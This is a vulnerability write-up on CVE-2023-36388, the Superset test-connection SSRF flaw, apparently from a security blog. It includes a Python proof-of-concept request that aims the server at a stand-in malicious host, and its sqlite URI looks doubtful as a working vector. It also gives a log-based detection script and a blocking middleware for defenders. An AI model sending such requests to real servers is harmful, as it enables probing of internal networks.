CVE-2023-36388 is a vulnerability in Apache Superset up to and including version 2.1.0. It stems from improper REST API permissions: an authenticated user holding only the low-privileged Gamma role can reach the database test-connection endpoint and make the Superset server open network connections on their behalf, which gives them a Server-Side Request Forgery (SSRF) primitive. In this post we look at the details of the vulnerability, how it is exploited, and how to mitigate it.

Vulnerability Details

Apache Superset up to and including 2.1.0 enforces the wrong permission on its REST API test-connection endpoint (TestConnectionView, exposed at /api/v1/database/test_connection). The endpoint exists so that users who manage database connections can verify a connection string before saving it, but it is reachable by every authenticated user, including those with only the Gamma role. Because the endpoint attempts a connection to whatever host the submitted SQLAlchemy URI names, a low-privileged user can make the server initiate connections to internal and external hosts that the server, but not the attacker, can reach.

Exploit

An attacker exploits the endpoint by sending an HTTP POST whose connection URI points at a host of their choosing. The following Python snippet shows how such a request is built:

import requests

# Target Superset instance. The token belongs to a low-privileged (Gamma) user,
# which is exactly the point: it should not be enough to reach this endpoint.
target_url = "https://example.com/api/v1/database/test_connection"

headers = {
    "Authorization": "Bearer <INSERT_YOUR_ACCESS_TOKEN_HERE>",
    "Content-Type": "application/json",
}

# The host in sqlalchemy_uri is the one the Superset server will try to reach.
payload = {
    "database_name": "exploit",
    "encrypted_extra": "{}",
    "extras": "{}",
    "impersonate_user": False,
    "server_cert": "",
    "sqlalchemy_uri": "sqlite://https://malicious-url.example",
}

response = requests.post(target_url, json=payload, headers=headers, timeout=30)
print(response.status_code, response.text)

On a vulnerable instance the server accepts the request and attempts to connect to the host named in sqlalchemy_uri (malicious-url.example above). The reply, whether a success, an error message or simply how long the call took, tells the attacker whether that host was reachable from the server, which is what turns the endpoint into an SSRF primitive against internal resources. A patched instance denies the request for a Gamma user.
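Added example, not from the original post: a small detection script over reverse-proxy access logs. It parses lines in the standard nginx/Apache "combined" format (the sample lines below are constructed for this post, not real traffic), keeps only POSTs to the test-connection endpoint, and reports clients that call it repeatedly or without a Referer, the pattern a scripted SSRF probe produces rather than a user clicking "Test connection" in the UI. The threshold and the assumption that a reverse proxy logs requests in front of Superset are mine.

```python
import re
from collections import Counter

# Constructed sample lines in the nginx/Apache "combined" log format, as a reverse
# proxy in front of Superset would write them. Not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Sep/2023:13:20:01 +0000] "POST /api/v1/database/test_connection/ HTTP/1.1" 500 211 "-" "python-requests/2.31.0"
10.0.0.5 - - [06/Sep/2023:13:20:02 +0000] "POST /api/v1/database/test_connection/ HTTP/1.1" 500 211 "-" "python-requests/2.31.0"
10.0.0.5 - - [06/Sep/2023:13:20:03 +0000] "POST /api/v1/database/test_connection/ HTTP/1.1" 200 27 "-" "python-requests/2.31.0"
10.0.0.9 - - [06/Sep/2023:13:21:10 +0000] "GET /api/v1/dashboard/ HTTP/1.1" 200 8123 "https://example.com/" "Mozilla/5.0"
10.0.0.9 - - [06/Sep/2023:13:21:40 +0000] "POST /api/v1/database/test_connection/ HTTP/1.1" 200 27 "https://example.com/" "Mozilla/5.0"
"""

# One regex for the combined format: client, timestamp, request line, status, size,
# referer, user agent. Unparseable lines are skipped rather than guessed at.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

TEST_CONNECTION_PATH = "/api/v1/database/test_connection"


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_test_connection(rec):
    """True for a POST to the test-connection endpoint, ignoring query string and trailing slash."""
    path = rec["path"].split("?", 1)[0].rstrip("/")
    return rec["method"] == "POST" and path == TEST_CONNECTION_PATH


def find_suspicious_clients(log_text, threshold=2):
    """Return {client_ip: hit_count} for clients that POST to test_connection at least
    `threshold` times, or at least once without a Referer (a script, not the web UI)."""
    counts = Counter()
    scripted = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_test_connection(rec):
            continue
        counts[rec["ip"]] += 1
        if rec["referer"] == "-":
            scripted.add(rec["ip"])
    return {ip: n for ip, n in counts.items() if n >= threshold or ip in scripted}


if __name__ == "__main__":
    for ip, n in find_suspicious_clients(SAMPLE_LOG).items():
        print(f"{ip}: {n} test_connection call(s), review this client")
```

The proxy log identifies only the client address, not the Superset user; correlate flagged addresses with Superset's own action log to find the account behind them. A burst of calls from one client, especially with 500 responses (connection failures against hosts that do not exist or do not listen), is the signature of someone using the endpoint to map the internal network.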

Original References

For more information about the vulnerability and fixes, refer to the original disclosure and official patch notes:

- NVD - CVE-2023-36388
- GitHub Advisory
- Official Fix Commit

Mitigation

The vulnerability is fixed in Apache Superset 2.1.1 and later. The fix tightens the permission check on the TestConnectionView endpoint so that ordinary Gamma users can no longer reach it; it is restricted to users who are allowed to manage database connections, which by default means Admin users.

To mitigate this vulnerability, upgrade to the latest version of Apache Superset, following the official update and migration guides:

- Update Guide
- Migration Guide

If upgrading is not immediately possible, block or restrict access to the /api/v1/database/test_connection endpoint in front of Superset, for example with reverse-proxy, WAF or firewall rules that only let the administrators' addresses through. The endpoint is needed only by whoever creates or edits database connections, so denying it to everyone else loses nothing for ordinary users.
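If you would rather enforce the restriction inside the Superset process than at the network edge, the following added example (my code, not part of the original post or of the Superset project) wraps the Flask application in a WSGI middleware that returns 403 for any POST to the test-connection endpoint unless the client address lies in an allow-listed network. It is attached through Superset's FLASK_APP_MUTATOR hook in superset_config.py; the 10.10.0.0/24 administrator network and the stub application used for the offline demonstration are assumptions.

```python
import ipaddress

# Path of the endpoint abused by CVE-2023-36388 (trailing slash stripped before comparison).
BLOCKED_PATH = "/api/v1/database/test_connection"


def is_allowed_source(remote_addr, allowed_networks):
    """True if remote_addr parses as an IP inside one of the allowed networks.
    Anything unparseable (empty, garbage) is treated as not allowed."""
    try:
        ip = ipaddress.ip_address(remote_addr)
    except ValueError:
        return False
    return any(ip in net for net in allowed_networks)


class TestConnectionGuard:
    """WSGI middleware: 403 every POST to the test-connection endpoint unless the
    client address is inside an allow-listed network (e.g. the admin VPN range)."""

    def __init__(self, app, allowed_cidrs):
        self.app = app
        self.allowed = [ipaddress.ip_network(c) for c in allowed_cidrs]

    def __call__(self, environ, start_response):
        path = environ.get("PATH_INFO", "").rstrip("/")
        if environ.get("REQUEST_METHOD") == "POST" and path == BLOCKED_PATH:
            if not is_allowed_source(environ.get("REMOTE_ADDR", ""), self.allowed):
                body = b'{"message": "Forbidden"}'
                start_response(
                    "403 Forbidden",
                    [("Content-Type", "application/json"),
                     ("Content-Length", str(len(body)))],
                )
                return [body]
        return self.app(environ, start_response)


# For superset_config.py: Superset calls FLASK_APP_MUTATOR(app) at start-up, which is
# the supported place to wrap the Flask app's WSGI callable. The CIDR is an assumption.
def FLASK_APP_MUTATOR(app):
    app.wsgi_app = TestConnectionGuard(app.wsgi_app, allowed_cidrs=["10.10.0.0/24"])


# Offline demonstration: a stub WSGI app stands in for Superset.
def _stub_app(environ, start_response):
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"ok"]


def simulate(method, path, remote_addr, allowed_cidrs=("10.10.0.0/24",)):
    """Run one request through the guard and return (status line, response body)."""
    guard = TestConnectionGuard(_stub_app, allowed_cidrs)
    captured = {}

    def start_response(status, headers):
        captured["status"] = status

    environ = {"REQUEST_METHOD": method, "PATH_INFO": path, "REMOTE_ADDR": remote_addr}
    body = b"".join(guard(environ, start_response))
    return captured["status"], body


if __name__ == "__main__":
    print(simulate("POST", "/api/v1/database/test_connection/", "192.168.1.20"))
    print(simulate("POST", "/api/v1/database/test_connection/", "10.10.0.7"))
    print(simulate("GET", "/api/v1/database/", "192.168.1.20"))
```

Two caveats before relying on this. REMOTE_ADDR is the address of whatever connects to the WSGI server; behind a reverse proxy that is the proxy itself, so either enforce the rule at the proxy or install Werkzeug's ProxyFix with the correct number of trusted hops first, otherwise the allow-list is meaningless (or spoofable via X-Forwarded-For). And the guard compares the decoded PATH_INFO with a trailing slash stripped; check it against the path variants your server actually accepts. It is a stopgap for the window before you can upgrade, not a replacement for 2.1.1.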

Conclusion

CVE-2023-36388 is an authorization flaw in Apache Superset caused by an improper REST API permission check. An authenticated low-privileged user can abuse the test-connection endpoint to make the server open connections to arbitrary internal and external hosts, an SSRF primitive. Upgrade to a fixed release promptly, or apply a workaround that restricts the endpoint until you can, to protect your systems and network.

Timeline

Published on: 09/06/2023 13:15:00 UTC
Last modified on: 09/11/2023 14:15:00 UTC